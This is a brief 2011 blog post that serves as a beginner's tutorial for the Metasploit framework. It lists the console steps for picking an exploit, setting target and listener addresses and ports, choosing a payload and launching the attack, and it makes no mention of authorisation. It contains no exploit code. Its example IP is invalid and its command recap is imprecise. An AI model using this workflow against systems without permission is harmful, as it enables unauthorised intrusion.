Saturday, September 10, 2011

Metasploit Tutorial (basics)

?
This is a tutorial for a program called metasploit. You can download the program here: http://www.metasploit.com/.

After the download you must perform an online update. Then you can either run the the web version or the gui. Next you have to show the exploits and choose one then you will type: use (exploit)

Then you have to change a few options. So type show options and you then have to set the RHOST to what ever the computers ip. Then you have to set the RPORT to an open port. Then there will be targets to set like this.


set RHOST 189.829.13.19
set RPORT 27
set target (OS)


The OSs will be displayed.

Next you have to use the check command. All you do is type check. This will tell you if this works or not. (sometimes it cannot be displayed)

Next you type show payloads. Then you will choose a payload to use like this.

set payload (to what ever option you want to use)

Then you must show options again. You should get other options like LHOST and LPORT these go with your computer and you set these the same ways as the RHOST and RPORT. So this is what you will need to do.

set LHOST (your ip address)
set LPORT (an open port on your computer)


Then you will perform the exploit.

So to rap this up you will do these commands.

show exploits
set exploit
show options
set RHOST
set RPORT
show payloads
set payloads
show options
set LHOST
set LPORT
exploit


Keep Rocking, Keep Hacking

No comments:

Post a Comment